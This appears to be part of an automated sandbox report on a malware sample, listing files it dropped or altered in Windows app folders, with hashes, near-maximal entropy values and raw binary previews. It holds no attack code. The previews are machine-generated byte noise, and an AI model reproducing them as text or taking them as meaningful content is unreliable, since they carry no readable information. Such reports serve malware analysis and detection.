                                                                                                                                                                                                    SHA-512:7102C9EC50C3487E3F10FD82283B1FA51E9EB81B0490CC2C9CD4E931E6F37074432E9E6AC7BDAD40292E045C3126E64ABDC203E225FDDC8DB0B83EEF818EB549
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: N.|...SHG....Vi.l._.."6..2x,Yv...6A..4..~.....J..Q5p9.j...4..I.t.x."n.,.l.......?Y"..]..c..2.q.P..@.$..[WQ.'..fV..J..<...F.../.....>do<#W.+..T<<...h...xt....t.e.L.[...?...E..).Sl.g.....VV.R.M..."..k.]so}....?.I....6...^.k..z..].i|.D..C?{.....{.im........0EU...:..A.J.n..+...U.|.5..g)F".FI..Z.FO..@/..E.k...........?q.z.cQ.d...Fm2e..[...T.S.K.o.Y.>.....2|...aK....#..a.m...O.v._.G@Hh.vO..$.Y'.......'..j__.....AQ%'A..<V...7...$.:..)....p..H(wA.[..;;l.;..Z.._`.}m.M...<.........#..B..=-.$.........\.A...v..M...U........3t1o~p..2n.D.O).....URw......#h...Y}.=...Wy!.".."B..GC...h+.J...sU. .X$9:...g.t.I.....9m..y...k.....2-.M.h.B1j@....&..`.B.U.l..a.>....j.~WV_..`0....w..<......8...2].i...>.]7...?..../}W....6..[f7g..j..==xm... ...,[.Og...EG...~6..Rh..A ....Mo....Z9..>>OK#......Ed.fY....GF.....&...-..$P.u......i.fjD"'Y_o.p@.,bZ.b....ZB... ..Z..\=Fy.6NW.0...} u...kVz..a.......3..J<..t..U\.3...,c. .He...x..T....PD(....]<)R~a...s...8.^.p........D....W.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9746568966298685
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:epOcpxsvT/io9LFW0avsnFscnxInr7eWQgeYimCJsyBXNYRpd9CBd:rjvLioHjFr67eWQFbmXM07cd
                                                                                                                                                                                                    MD5:B67EF984351DA2636716B25CF9260750
                                                                                                                                                                                                    SHA1:1AE2CA426EFD026FC415AAAE422C52F73983A5F3
                                                                                                                                                                                                    SHA-256:E093BA4E7AE6343CD1BC59F2E88E4E232B4F6CC455B0B25A921779D3828C837A
                                                                                                                                                                                                    SHA-512:C339D43AB0F8AD3B42E7E2805D391372D34335C727BB1C58441379EB50EF622F94EB5F268E5F0E61702BA48620F4012E16207FE56355F5A7F08113593C0124AF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: :.Q..\_'v~.`K....?..*.K.em....../.K...ZHd....<.g.V..A.{.y"..Zo.K....i.FH\...3...27...2....g.H4...F.g..E./.j.g.r.......@*....C.k.>.;d^..TQ.F..@...!.L^.@;.s`O..~.30...z....R.......=...../(!.N.....h...y.[.....{8F.....\,....7..5;_6>....[.p/.......il2.#{H..]06..,.}..C+.....P...A..m.E(..<....CZ...[..-.np....(?.p........ \.1..T....R?m.s...k.U..H1W....g.Ew...qHO-..X..d..;.>.x.......r.TW.?......n.re"....c...'./...7#A........ThZ....@.fLb.Q/..D....AG/ioX"..n.........1.v.c.B.........D+&.H/.O...:$..".`g.l..B..+...Ki......h#..?.....)..lt..kW...g5.g4m8.\......4&.C...V.b.'..[].....v..E...'.....dT...2....m.......w..V..Y.%%f...SA....R...0.:m..7m\_.bx'..].....3ES.M........7...^N....w....'....6.:..R......N.e.[R[[.e|....4..A0.YrNH..VH...R..~.!.w..w...s.\...2=.].po...~.AE.q9.~.#...P..8.s.El..>.c...Ss_..3...x....3.0Qjk..2.l...%7.<..+...+q..>..E.....^....)6...gW..N......1..$y.l..Gg.....J....<.q\4.9..?..!....D..w...<.,...o.j..........Y..Sd;B..K-Bx.M.]..n
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97951075794296
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:At7KfmpgOyk5qOF0S/IjnddSHLlUkIdJZ+9ffXW9bHXZAnxq:At7K0wk5qKIjdEI/ZcffXSXcq
                                                                                                                                                                                                    MD5:11C97960CFC4F96016AB7AECA5CABFB8
                                                                                                                                                                                                    SHA1:D2DC8AF070A73CD61826E7451549A5ABD1D47675
                                                                                                                                                                                                    SHA-256:4713BAF80049F0801EF9D804CC7729695A2D5A47F6E36389F7E6C0B05E24894E
                                                                                                                                                                                                    SHA-512:21E7DEDC7482B2C37E7BCC8D47F16050452E410116DB278C9A30C6CE561905A9D2C4D4896B553EA1775E4A3A93DD597BEF96DE3348A36C2D913A9E38C2E0BFB8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..=..0J?..\9...4m@..Y..4.....(.t,...Z..~^...W.<.O.|..0........A>.^w ........j.ft<f..+..Y...........A...L^..Dw..;0..t...d..,Fx....S..B..l.G....Q>JF....3..XN."F.c..C.<...s.....Z...TfgR'.-`.3....9S....U{8.._:~....O.~t...!-.G.T..0.*.A|]...\.n.O......$.....x!."....D^a2.&..a...<..k.m.#.T.f.Y..{.3e<..KN..9..'fh.....Ef..Z..<...]....T|..:.n..;.<;SJ.....k25Ec.f..K.".(....1b.y....>...o."...g...1d.v._....x........]B:..x.v.}.]..h..T.t..*-..c..].>Ix.N|O....r.......ff.bt.i........]..~c(..]X|..&...#..{..^#DK..&........R...... ..2.w..9>.y.......ua#kJB..lG)..)a.n..M.....W....._@.......Mn....&.....VCd..5P.~z1..Q-.o..9.@.f..H...I].....B.:.@...}....9j$..:..T..(.G.x...>..Z..$.v.).m%0VY...8@.......J.....S....1.....*.......W..7y]...F...l.U...0.........4...\.`.........-..J^z..6n#.......17.......R....K.....(..Y%..taq...Gs.p..$...E~.c...109a.5{|..`..El....Q....h. ..,s.Zm.4t/......oI..r(p.,..}..l..G.p.g#...].&I..U.z.C..l?..r.P.B.....V...g..L.t...a..9..........z
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976846774885829
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:OOj3DDbBZQCfrVlCtzOy5kbrrdtACxHmJkaU29AXf3Z0IYnO/S:Oi3DBRViOBdBhceXvCIIOq
                                                                                                                                                                                                    MD5:81001E11B66EEEB1E6EFE78B203407CC
                                                                                                                                                                                                    SHA1:42BB6B5C3F68DFF3970F8ACC4C15CF7D5FE316F5
                                                                                                                                                                                                    SHA-256:F6AD767671F75400F010C8B71E1967CF06FBA8C4EA4173B097299F2A23AC4FAB
                                                                                                                                                                                                    SHA-512:D418394240F14AB2EB6DEC80443AD2363BC29CB27EF396B7DBBB97877C4444845AF886FA5172F747B13295E0611011F88DFC7A3A3BD45B0E7CB1E55E4A39ADE4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....\.........}..e-......Bb....1..=...mIF]..?S...^n..UD.tJ.....=q.I...7......?.5!...M..o.2.>..*.[.S0..b5.q..*.....#x.....+~\x....>..V.4.O...Ag<.v.;Gi.S...&1.f....}Xc9......X.O.........a...?.......1W..($>..g.e...c....O..!y.Yr.!".p5.a.P..n.6^%..u..J.q+..[.&.U[>.xH.....].*5.xe.P9..`..H..K.............b.Q.1.k..6.b....^s{..4.z.7.....=..em.a4@L.u..'nq..<.....a......>].w..x.MxJ+.L.....r....F`..&.......>.....vA".x......(..*....A...<.[4e..+(....R.....<..B..I.B.\cy.\a....8....8x.-.%..C.).......9t.i?..V......>....1..T.c.=...IExL.40>[6.J.....0j.....x......m.R/"2..|..gL.:...S0.........*(.$...u.P....C.V.)hD-. .L....q.....<..p.v...G...v...}W......../.....iC...K....Bh..d.r._..I..J.FI...dcL...m^b...s.w.m.....X.P^'..)..3]I......n<I.|...k..$..i..%..r...>....n.I.......w..2........uL.ay......3.z...zE....R.........onO'=P=p..7Q.^T...@.,8.F.mG%....c$.....wb..G..=Wo,. .2~.$.P./MK.2`.;A_k......1]...*'...."..>s...;I5.....((..l......i....q......Ug..V..i..je..I
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981043486773375
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:yBLXMfjdm57WCavLug8pU1Tbl8asHhAT6QvjECl0:WLXxZWCaG1aEATE40
                                                                                                                                                                                                    MD5:23C91631BD6952756521177ADDA096DA
                                                                                                                                                                                                    SHA1:A2EBFE8D6A4C39C30BC2CAAC8A275D7C23B66736
                                                                                                                                                                                                    SHA-256:FE2754D336394765E7B1355B9495D63FE8CEAACF40CB3B214B2F994D94AD5064
                                                                                                                                                                                                    SHA-512:CB3B19D889C0D4BEE2F067C62F5BDACB61683B4B0A44BDCCDE2DE173CC02CEE7F47EC8499EDF2D1FB5399D711AE9A9E0B06242CB523E2F03054C7B764FC543D4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....G..mE.......P..IE.QC..|^.....=`#..a....[..5..`?$...K.e..U.....4..U.{4MWq..j...vd4.....et{.."e.F.?..(....s./..[..>@..>s.s..G.[s....W46...4.*....kM|.4.\*$.=]..5.8=...rx...2.7.^.U.RzR.GTf..K....y.....)..R.."n...j<...'...T.1....l.~:......"...~c.z:.X...*H.j..F.P....O....+..b....;....&..n...w.......c........(UN.V..O.:. .h.........k.."...$...}..Fx....<.\......*.=..eB.Q.......A.....q.v.wZ...J...pC...R.E!..OJC..55.q#J...-..J`>7b......@...!..).. ..n]...J.......p...........@._\..v.H.....b:O.`2r..t[7......J.\...h.B.{..=...Y.........br.O....`r.!...........U.N.j....X.y.8..."....G.y..7p.....wK.a,....$U.c.DW..J..m..!.c<.R..X...D..E......W...4.q..+...|o[....T.:y3JT.f.E.S...+./>.Gl.x,..t.c.:.o.;S...w.../.\A3.Y..........;.H..?.....C....d{Xq...l...n=..).#.)..........p........K...'x.B.!.N:..tg.dg.e.w.v..=.*...s."{.ocKF}v.......|..........v....../..LH...).u..r..k.>L...y.....N..L...;F!..p....(i...%.c.?;..P..3i.m.....:.|.=...vw...`UBJ3n......1?O..1@.r.a>l...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977969663944942
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:E/ez0cxdfMmiiDY4nNE0Co4B5ZbHBor9KmYUwq0I//TaX:itcxwvo4B/BohK40GGX
                                                                                                                                                                                                    MD5:DDF0F1A6562904CBD76896561C2B395F
                                                                                                                                                                                                    SHA1:7783D5A51242B7FBFB1884A749315E5A6862EBB3
                                                                                                                                                                                                    SHA-256:581557C4102BDBE644EE262E51E249AB452EDBF5C2801603CA300DE04F7D217E
                                                                                                                                                                                                    SHA-512:B9785049A00E8F34E6E653A165CB125E2991F2B8A8857C887D14E0180673B53C1E9AACEE7E193DC5762CDC1AAB22BE435D68C284E166D4067D38A2D3EB0F8408
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....j..Q..6.....P.(..a,[..t.o\.D..../...m....gu2.V..[H"......E....m....9...s.#x.....sd..O.)mfd.m.4 ...3......*../...k...D Sbc.4.............8.........9.0.~..X...a..u...f{k.$..@.B..X!....Ji.....?q..x...e...!.`b..`mN.....)$4...c....bg.{.F..z..M..$.%...(.tFoa.....h}..7..g.M.3.R.J..Z.U.oc...5..EWb-O~g....Y1S......`...T.i..9.>.Q.E....._..L.....q../``...n.=...m.T...D._.....qH......7P...)sf.p...Fz...(0...P...pR.......T.3lj<.D.~....*..l.@0...e....Wx..yVL.$7..iT...U..._B.q.s.kXD3K.K.]..W..........@..5....abL.k1..b.P......b+1^.pi4.w.W.....{O..0....HK.S.<.4D.k..mw:.W.{h.=H.Ei...-(.\kJ=E..Z1....J.t........xsO..18..~. ._Ub..9+..FB.@%v.../Kbj.UR.....}A`.? l?...5..g.s.p#w.E....<.s..h..,.fy.H*....5.6..~."..mU......OQF.[.Z...:v.r...i.P...L..1E.sH.9.....5.~.y./.7.H...^._...5&-[.fQ..^...v<..<.>..Kx....2.!.....r..T.w...f..2...kU(5.4..@...*..S./zLF?..u.....q.i..Z)...aN&:......*..%!.w`-..:'.TG.....q........^....j..!l}...1.y.....<CC':..o..f.F.B..m..-.^..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97818080602771
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:csPWGALn8Cl/ytRcGVaN009dOj7/DbP1/T+gaSPJyO+9NYeG3:ccJM8ntOu2r3Q/fP1/T+gwN/G3
                                                                                                                                                                                                    MD5:A589B04E43F87CF2C4E7C55352667893
                                                                                                                                                                                                    SHA1:6E8482BBF17D3A10117D7EF25A40FF70617C927F
                                                                                                                                                                                                    SHA-256:6FE8B7E0ACFF47F936A5D21D28A4E75DEC31461F6D7543DF5A9831CF7F059300
                                                                                                                                                                                                    SHA-512:A6C1D24DF5C6AAEFC58B8FE8F3704B43F88C5D3AB585D38E5B0E65D22CE46744F720B05B658316BBBEAA3A330DBF66067FB523CE5871316AE46872B468F6CCD7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .H.l.S".T&.....p3.l.!...............>.&b>...X..H3....S......UQ.lo\$..M.....a..&..[.L.@5....M.=p(.\...`.J..?>.;....2.bg..#....F .{..bu.....q.9.#n..n.<h..*N....[.o....qn~.2..3...U.S.....F.:.UO.......J`..<..w1...Y.(..dab......M..VX...sW.&*&.+.gp........7-..$6....RFV8J.b`.m"r.3.5..llxZS[.{s...c.9e..,b.....j...v.R\..kX... ...7.......]..^.0..Y.."#..@.8h...W.......b/DZgi%.....3-.k..J..C.V9.O...]....;(..4.t..3?E..".P...9.L....'..'..=.aK.C.W......X......pB..oIE.O.HB...X....<.4Ut.o..r..!...h{..L6..........m.....Y..C.b0.F...Q....R..AJ|!Wx..5Z..r.;..e.@.`..J,.,.X.d...............M../..Z......[~..*.V../.........y...>_g.M...W+9RLo..,.~..(...~W..><..T....q...S(H....'.^..... d....(X.'........L..J..Zl........9..'.}......V.<.%....-......x....3Hi...{^....Agt,?....bnM....f@k..o.....O.....5B..6..r.e..k,.@8...)QW....k..<..M..f..i.tb=........^.RG!.TxV...k..t.{"..f.si. .S....%u......g.2...5./....!..ab..4.i.b...'<.!.X.;I...0D...W.;s.h....^....J..e........{
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976762705617206
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:sbbJKXRYcpaRUwNzDMFYlwXDQRlin8UONF1sW1TyvV/z:sbbsScpaqwZDMFYlwkb7f1dmr
                                                                                                                                                                                                    MD5:55DA9FD3EC2652574EA44190E30618C5
                                                                                                                                                                                                    SHA1:0F0D8ED3F5780733213FD54B4B5451F67E798D3A
                                                                                                                                                                                                    SHA-256:A4959B581B3DC131507FBE67B3A1A1C140D5E871AA1EAC328A6B2464918184E9
                                                                                                                                                                                                    SHA-512:02C6C02D62DA3A40E517FEF68FCD096BB53416AFC82AB1EF7DE9EA48F724B2F5869E236B9835CB6CCDAE765591007D42FA469382A923108909E7EA68763CAD68
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 0.d..\.K...C..<...x..D......m.>.v-.....).3......H.0....QB.[>:]{.jl.\.N.v{.V.=..G8L.y.JJ..K...c.....-j..'+.M.,.".-...S.=..R$....(.....T.P.@...s.....[..^C..7H.l......91.C..Yv.........H.....<.+0.H.l2...........X.ZO...8.`.bu..)..J.....'Sy.N.n...Td.vGY.k...I..c..........#me..w\.X..(2..H.l>.....p.U+...[x..>......z..,sT].=]."cj........O...... %..D...vE.,..s.D..=!..&....rj.})..bt(.!.Zu.<y...7B=A.L..g..g...H...~.;.pvcN.8X..IuA......k?.`..."...s..#P......&..u......yA...._.).3.pQ..(...A.(_.$.N..Z.<......IO.A:...*g@......Z.S.v....K..Y.{..>.../.....HEz..>.i...9...>....Y7MmuQ.D.....*...X..Y.q..^.&$...DNv*....P.i:_P3..Xq....[wt....6...\hj...........IP)..xd....w.d'!.@.=..K...&f.N.....B{....[S...L......[..6o..f...C.6.....".I.E.#........?v...'lP-..o."*......K.yw:.....QI<..../.J......{....>.Q....Q.mk.6..$.v.w,..(.Sg.l%k._3<...;..e.S.....2w/$.2..E9.......d.h3=B/..{.....G...A.k.&8O............3......5....;....".....e{...r..:%0.D.....),-...!.v...63........jtv>n.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):24905
                                                                                                                                                                                                    Entropy (8bit):7.992813509648109
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:a/auCj2vshi2fQ9tLKimWZCCG/VmxrNgH:4auCjCUbOxCOs
                                                                                                                                                                                                    MD5:38CE9D1E86BBA89CCDDAE4B444AAE6FB
                                                                                                                                                                                                    SHA1:F19BFE5687EAF706D77449BCAD5066A0F94E2F1E
                                                                                                                                                                                                    SHA-256:A397336227236722E427CCDD9BA6EF1E32DC42AACE4EC99320E275DB02AABE48
                                                                                                                                                                                                    SHA-512:FBC1A3DE40BAFA7D6FD551A6EFBD835E3ABE0592256BCED72BE89C69D38674819B50BEF7E2E9AA86DE6393955968A5636AFA996D181585AE2E92B85519420C40
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..C......NZW4g...$F...US.4..B>...&............H0d.nk...kz.U....,"..Z.P.......ke.6.#[V.|N..g...vHr..)..5o..QG...xw...kJ..(.z...r5.4....q.........Us*Z.....~..f.DK.%2b.6x.L-....?W.g.MW..^.>.V.1)...+.Z...hT:#-..#,..~....R..7..d...X....KV9...@.4..P..TH.b.l.......,.Y....i._./..5....F.g.'....H.!Z.~b.#..p...1./_..Y...: .....?...u..J..?.mT'?./C.._-.\./X...7+tnk.C.e..X...Q.^....."iG......r...2-.......9#.e...i.b.O..e.h0....J.3.Q!.....B.....Zc:.YU..Cg-v..9..#.....@...-.m$...k..5..:.i..5.Ln.....ss... ./..,..GE..38...N...c./.%./+....Q@Y}..8+?.c"..i....x]...HJ...<...UUM..s....g....,.&_=.$....<E..J'b.......R.${j.6^c........e./.I.[....a.........)+..K..h3#x.z"..f..UE...,..V....).K. ..h@.$...0..W~!.Q.q.o..WMR^v .$.L.. x.|........{..&....."93.|...9....x....</UY..<.d..n0..YG.Jz..^.TWI.z7..U|$...._.l..0.e..mw.$.Y...AH:S..n.6..N....8..w..};]nl>..8..*...`.... .w.@e.I^m..~ .$.........Q...n't.w..=_.b.{...#].u.........l.9..l....!.z..TyW..B.e.j.@(L.~.N^.....3..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975850556952944
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:lBfgQwlTXOf27Pvl/yY9fQsCxV7bdJHOqd+LvC+FXyzMEL6NGqS:fYQwlDOs3l/yeYsCP7P+Lq+FXyoEL6Q
                                                                                                                                                                                                    MD5:F850531E305D1106570808497A9C88BE
                                                                                                                                                                                                    SHA1:5C77922F7C43C920A5695DF196B43E18ACC0881A
                                                                                                                                                                                                    SHA-256:3C38A448AFABCFC55BB9186BF63DDE97B756C7B0D1B326DD02688FCFE97E0407
                                                                                                                                                                                                    SHA-512:107F0EB6188D6581185E496165EE68E4A3DD108D8883D50CD7B2391E9D27ACC63AD0FA8AEE3F597CD8019AA64113BE48AB57F3A896F9D554C8B40492ACE4B51B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...CF..._._W..P.e?.r...g,p...zp#..G.nv....8....+..!^.U.xz...r.#..*.I.8.Z1_.w..}.........o.>*e..Q.Z/E.S..E(.#...7cOsG%1.;k..z>.%.L&..q.WGF_..Z.....-kpG.....V......`..Q...-HV..W.=.."a...B......3&..7.0..X.O.".Y.VX.....!......@.......i..S`.... ...W.I>..3H...-.mz....4.f..."t.;..N..#...J.s....>...<Y..;.Q.."....-..d[}g...o....#..([..?../O.m....EF.H.W9b.b..:M=..#...........T.G.!.@..-#.........r.:.g.l..0.|.H+u......]....q.'.(S".z=.u..:8.a.B$bb....{..<xc#..1.X_Y....*...:.}./+FS=.......{WbR.f\..N.-..\N.r.s&..-.l|..QN.b.)g..b..1.>j..[..;..$.".3.n.L..kqk.Xb.O..'$.$_...gW..ay...?...."4..).1....:7...P.3.......%._.C.,..Q0a...f..e..t...|.py.^.6Y ...^kp?.)..WM..%x<h..n<&..Y.?#....|[.k....NT.}.b...t'..3lX.IZ.......J..+.,.mdwJ..6...o+../..)-h.<....D.....). .:....9....3:(l{s.X(R_E0.jtb>BG.e?..B.... ..E..g...7MN.q_GZ..T%.Y.......Y..f._.O<.v(mW..2.5We^K.X..0.Esk..9.-.P..=.....kdB.......6..h6..o{..@.].r.{&(+'..w8Y.....6.\...,...M...K..a.........1.L!.....D......0.....G
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976699051578017
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:vuf1wMdGj71XF4UYBtpmF4oW5ss+Bdw32mvO:vuflGlXaUWoW6sQdO2mvO
                                                                                                                                                                                                    MD5:30A240D6D02B2D54CC8EDAC1E7FB9C9A
                                                                                                                                                                                                    SHA1:7DED9D86827AC39F62247D5DA6BF3E233DF54D27
                                                                                                                                                                                                    SHA-256:189D9A59461B8139948EF14B4A71D499452B5F9B5E3FF549D173817E1AD77C34
                                                                                                                                                                                                    SHA-512:EDE0FC2CAC8A96E70980993D7FFA90F53874549C826F946D90621976B1C09E6C0A2905FD8669A961C437A62109245ADE932396FDA2A683041483331853D8441E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ^.i[.;..Z...>;.1u.......[.z....3T.Z..._..?} ..F...r...FA.S.n.}fB....WP.14.*..{.>....P....@.N.......U..M.:L..%q..S...q0f.....G.V.T!......J0.dy2:.......O.A^|VY.]..&9w.t....~C..e.k.6.. .._8..........1.Q.......\+.ln.B"6bR.r..<?FZ;."....-.#.Po.....P.l.g..Nf..'.RX..#.>r'..X..G.Q.lE.ZM.P7.'..y*n\...........Y"O..j.ob.K..f[...q.....i.......^..u.w...(|(i....(,.|^...H.e...p..4......p.....[/...7.;....R......2T6.].S....&Z......o. #...F.W+.xh.......wv..+:...Gn.5......u......(.Um...9l+....e..L..\....}.....U.v....sJ.t..G'....:.B(..J#..x..0eRP..9r.<.B...9U\.l.QE..&..,..:P\.p..E5....>#2_<.w;..Kv..-..G..&j{\cTX..q6......wi...ie.....<.4E...V."G...?.........hz.Tm.T.,..Z)..\....Fv.3]...[...O..#y....S.SVt@.me...&Q.......T.e.&.5.'....M.^.T.....J.C.2..T=.x.H....+.s.....~oJ<?u.>.\3..h........\6........[.[.x..m.*.\8.vuy.kt.XSh.>.&]....}.ng.EE...p.....a.l..sG<T....S.z....y.....B..m..3....-.}2t.D...Y|..........6.. ..<-<z..R.O..?..rd..L..$.0..cqY....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.979063847118713
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:qvzk0ghqSiAmvLdKkCnHhkTUX4EFO0fPqlBStCbi8z3X:qbBR/VdTNk4bT3X
                                                                                                                                                                                                    MD5:E69A8DB50037B846E3F2FCD5AFFE455C
                                                                                                                                                                                                    SHA1:910A228E33531A1CAE9971C94AF435E948B22AA0
                                                                                                                                                                                                    SHA-256:4DA11280EA1E20067AD08B10E5D99481FF226A205024CBB5EFC7EE5711BF4E6C
                                                                                                                                                                                                    SHA-512:E15D4CB88855B474BC94036511E0D8E1A0CB881684510F824880CFC7402AD6FE814EBBCFCE83A0D028F391866DC59A3B1F981A2DA0A6E14BDE3FEE654DC6026C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: |..Ro..I.'.*S..........Jk..ED.]........!...!...nl..h..6}Q{.H..*N.l._.qx8|z.+.....Oq.;.sm.B.]yn...O.5&.\i.@6.....M....C2.~.?....QJ...p...T.d!...O.N.Sp.]G....^.7..D:..Y.l..g....... ..>qA..v}.....d.........r..f......$..U.1.,...lU?b..g'.E....*7.0.1.........'.2|.+..AT-..R?..<_..8.0..;x<.W..Z....L...m042t.{c.#...m.C...!.?KX...?.>.<\....vc.Z.....8.....qk....>...}?....W.89.+.#.~..Cp.3......z....6....P.4FF....k........3(..hnJ.L...>{.KiY.8.i.....cT/M..hO"...f..'..8..C....i.......%xL....z...E.FP...`~....d.4.....A.b....b...[h..e.*.......co.>.#..s...s..V8.s......@x.b.5./.T...!U>>............:..:.&i..V.p...L...!R...W..v...;.b.,.d..b.......V.zX.k..%.6........l...._.W.:......%..(8...F.p..q....;{.<W...<T.w..g.=..@._J.t.Z..<..,./.>U.2.a}.........%S.v..L...^W.. ..$.4...H.Y.. d.......t~.H.c#.G .t..../.....7nR....#.d.......?.'...KeQ.f(=:.D..7(..7u.J.b..e"x.....<.3o....yD.k&bDE.+.%{.zNL.\..[..P.d..............k.t ..B^.+../a..2W)=....Q..*..Z.D."..c.0A$....C..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{9A5A0488-0916-4A6E-A948-516117A034B3}.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3913
                                                                                                                                                                                                    Entropy (8bit):7.952845237765851
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:0rArBjkmZtOkz2KPwNIt8tCaQ/425dHTuy8LIcg4hS6DnSs87cHGBq+:0rAKeOvKPMc8gL9mrg4hBSsYBq+
